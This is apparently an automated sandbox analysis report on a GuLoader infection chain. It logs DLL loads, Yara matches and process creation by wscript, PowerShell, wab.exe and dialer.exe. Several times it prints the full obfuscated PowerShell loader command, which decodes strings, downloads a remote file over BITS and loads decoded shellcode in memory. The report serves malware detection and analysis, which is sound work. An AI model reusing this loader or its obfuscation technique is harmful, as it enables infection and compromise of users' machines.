                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: tapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1739272158.00000000085DA000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: wab.exe, 00000008.00000003.1760053800.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1760156162.00000000246D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: wab.exe, 00000008.00000003.1759301650.00000000247A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000008.00000003.1759602090.00000000245B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000008.00000003.1759301650.00000000247A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb, source: powershell.exe, 00000006.00000002.1735332796.00000000076D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: wab.exe, 00000008.00000003.1759602090.00000000245B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1735332796.00000000076ED000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000008.00000003.1760053800.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1760156162.00000000246D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000006.00000002.1735332796.00000000076D4000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){$Becifr20+=$Sold.Subst", "0")
                      Yara detected GuLoader
                      Source: Yara matchFile source: 00000008.00000003.1761640645.00000000046B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1744712074.000000000B010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1744049696.0000000009D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1733782746.0000000005E26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Postt)$global:Becifr202 = [System.Text.Encoding]::ASCII.GetString($Digte)$global:Becifr203=$Becifr202.substring(290030,23745)<#Multihand Nonr Stom Dunnitetr Copistr Frag Daglnnin #>$
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Verselinj01 $oprykkern $Thankfulne4), (Verselinj00 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Verselinj08 = ([AppDomain]::CurrentDomain.GetAssemblies(
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forgivne8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forgivne9, $false).DefineType($Thankfulne0, $Th
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Postt)$global:Becifr202 = [System.Text.Encoding]::ASCII.GetString($Digte)$global:Becifr203=$Becifr202.substring(290030,23745)<#Multihand Nonr Stom Dunnitetr Copistr Frag Daglnnin #>$
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Tak
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Tak
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB779386 push es; iretd 3_2_00007FFAAB779387
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB77D7B2 push edi; retf 3_2_00007FFAAB77D7F6
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A0E5A6 push esi; retf 6_2_07A0E5A7
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA5CD2 push dword ptr [edx+ebp+3Bh]; retf 10_3_02CA5CDF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA3E4E push edi; iretd 10_3_02CA3E55
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA4FC8 push es; ret 10_3_02CA4FC9
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA0FCE push eax; retf 10_3_02CA0FCF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA21EF push ecx; iretd 10_3_02CA21FB
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA45FC push esi; ret 10_3_02CA4600
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA21AF pushad ; ret 10_3_02CA21B7
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA3B74 pushad ; retf 10_3_02CA3B83
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA4305 push F693B671h; retf 10_3_02CA430A
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E98F0 push eax; ret 10_2_053E991E

                      Persistence and Installation Behavior

                      barindex
                      Powershell uses Background Intelligent Transfer Service (BITS)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
